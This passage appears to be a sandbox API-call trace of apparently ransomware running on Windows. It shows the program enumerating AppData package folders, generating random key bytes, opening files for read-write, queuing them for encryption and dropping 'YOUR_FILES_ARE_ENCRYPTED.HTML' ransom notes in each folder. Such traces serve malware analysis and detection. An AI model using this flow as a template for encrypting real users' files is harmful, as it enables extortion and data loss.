| out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x406862f4, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x406862f4, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x407b74db, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Settings", cAlternateFileName="")) returned 1 [0114.384] StrStrIW (lpFirst="Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.384] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\Settings") returned 91 [0114.384] GetProcessHeap () returned 0x600000 [0114.384] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0114.384] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\Settings" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\Settings") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\Settings" [0114.384] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\Settings\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\Settings\\*" [0114.384] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\Settings\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x406862f4, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x406862f4, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x407b74db, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187fbe, dwReserved1=0x3187f18, cFileName=".", cAlternateFileName="")) returned 0x626878 [0114.384] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x406862f4, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x406862f4, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x407b74db, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187fbe, dwReserved1=0x3187f18, cFileName="..", cAlternateFileName="")) returned 1 [0114.384] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x407b74db, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x407b74db, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x407b74db, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187fbe, dwReserved1=0x3187f18, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0114.384] StrStrIW (lpFirst="roaming.lock", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.384] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\Settings\\roaming.lock") returned 104 [0114.384] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0114.384] lstrlenW (lpString=".lock") returned 5 [0114.384] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0114.384] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x406862f4, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x406862f4, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x3187fbe, dwReserved1=0x3187f18, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0114.384] StrStrIW (lpFirst="settings.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.384] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\Settings\\settings.dat") returned 104 [0114.384] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0114.384] lstrlenW (lpString=".dat") returned 4 [0114.384] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0114.384] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0114.384] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.3dbuilder_8wekyb3d8bbwe\\settings\\settings.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x324 [0114.385] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=8192) returned 1 [0114.385] GetProcessHeap () returned 0x600000 [0114.385] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0114.387] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="32") returned 2 [0114.387] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="3A") returned 2 [0114.387] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="DD") returned 2 [0114.387] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="FA") returned 2 [0114.387] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="CB") returned 2 [0114.387] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="54") returned 2 [0114.387] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="F4") returned 2 [0114.387] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="6E") returned 2 [0114.387] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="C7") returned 2 [0114.387] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="61") returned 2 [0114.387] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="5D") returned 2 [0114.387] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="7D") returned 2 [0114.387] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="D6") returned 2 [0114.387] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="A4") returned 2 [0114.387] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="80") returned 2 [0114.387] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="3F") returned 2 [0114.387] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="02") returned 2 [0114.387] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="D6") returned 2 [0114.387] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="2E") returned 2 [0114.387] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="F6") returned 2 [0114.387] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="F2") returned 2 [0114.387] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="49") returned 2 [0114.387] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="3D") returned 2 [0114.387] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="E0") returned 2 [0114.387] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="DD") returned 2 [0114.387] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="A0") returned 2 [0114.387] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="BC") returned 2 [0114.387] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="89") returned 2 [0114.387] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="51") returned 2 [0114.387] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="8D") returned 2 [0114.387] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="EC") returned 2 [0114.387] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="17") returned 2 [0114.388] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\Settings\\settings.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\Settings\\settings.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\Settings\\settings.dat" [0114.388] CreateIoCompletionPort (FileHandle=0x324, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0114.388] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0114.388] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x406862f4, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x406862f4, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x3187fbe, dwReserved1=0x3187f18, cFileName="settings.dat", cAlternateFileName="")) returned 0 [0114.388] FindClose (in: hFindFile=0x626878 | out: hFindFile=0x626878) returned 1 [0114.388] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 121 [0114.388] GetProcessHeap () returned 0x600000 [0114.388] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.388] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.3dbuilder_8wekyb3d8bbwe\\settings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0114.389] WriteFile (in: hFile=0x31c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0114.390] CloseHandle (hObject=0x31c) returned 1 [0114.390] GetProcessHeap () returned 0x600000 [0114.390] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.390] GetProcessHeap () returned 0x600000 [0114.390] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0114.390] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x406862f4, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x406862f4, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x406862f4, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0114.390] StrStrIW (lpFirst="SystemAppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.390] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\SystemAppData") returned 96 [0114.390] GetProcessHeap () returned 0x600000 [0114.390] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0114.390] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\SystemAppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\SystemAppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\SystemAppData" [0114.390] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\SystemAppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\SystemAppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\SystemAppData\\*" [0114.390] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\SystemAppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x406862f4, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x406862f4, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x406862f4, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187fbe, dwReserved1=0x3187f18, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0114.390] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x406862f4, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x406862f4, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x406862f4, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187fbe, dwReserved1=0x3187f18, cFileName="..", cAlternateFileName="")) returned 1 [0114.390] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x406862f4, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x406862f4, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x406862f4, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187fbe, dwReserved1=0x3187f18, cFileName="..", cAlternateFileName="")) returned 0 [0114.390] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0114.390] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0114.390] GetProcessHeap () returned 0x600000 [0114.390] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.390] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.3dbuilder_8wekyb3d8bbwe\\systemappdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0114.391] WriteFile (in: hFile=0x31c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0114.397] CloseHandle (hObject=0x31c) returned 1 [0114.407] GetProcessHeap () returned 0x600000 [0114.407] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.407] GetProcessHeap () returned 0x600000 [0114.407] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0114.407] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40555014, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x40555014, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x40555014, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0114.407] StrStrIW (lpFirst="TempState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.407] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\TempState") returned 92 [0114.407] GetProcessHeap () returned 0x600000 [0114.408] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0114.408] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\TempState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\TempState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\TempState" [0114.408] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\TempState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\TempState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\TempState\\*" [0114.408] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\TempState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40555014, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x40555014, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x40555014, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187fbe, dwReserved1=0x3187f18, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0114.408] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40555014, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x40555014, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x40555014, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187fbe, dwReserved1=0x3187f18, cFileName="..", cAlternateFileName="")) returned 1 [0114.409] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40555014, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x40555014, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x40555014, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187fbe, dwReserved1=0x3187f18, cFileName="..", cAlternateFileName="")) returned 0 [0114.409] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0114.409] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 122 [0114.409] GetProcessHeap () returned 0x600000 [0114.409] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.409] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.3dbuilder_8wekyb3d8bbwe\\tempstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0114.410] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0114.410] CloseHandle (hObject=0x324) returned 1 [0114.410] GetProcessHeap () returned 0x600000 [0114.410] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.411] GetProcessHeap () returned 0x600000 [0114.411] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0114.411] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40555014, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x40555014, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x40555014, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0114.411] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0114.411] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0114.411] GetProcessHeap () returned 0x600000 [0114.411] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.412] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.3dbuilder_8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0114.412] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0114.413] CloseHandle (hObject=0x320) returned 1 [0114.413] GetProcessHeap () returned 0x600000 [0114.413] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.413] GetProcessHeap () returned 0x600000 [0114.413] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0114.414] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54746ebf, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x547df81c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x547df81c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy", cAlternateFileName="MICROS~1.BRO")) returned 1 [0114.414] StrStrIW (lpFirst="Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.414] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy") returned 89 [0114.414] GetProcessHeap () returned 0x600000 [0114.414] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0114.415] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy" | out: 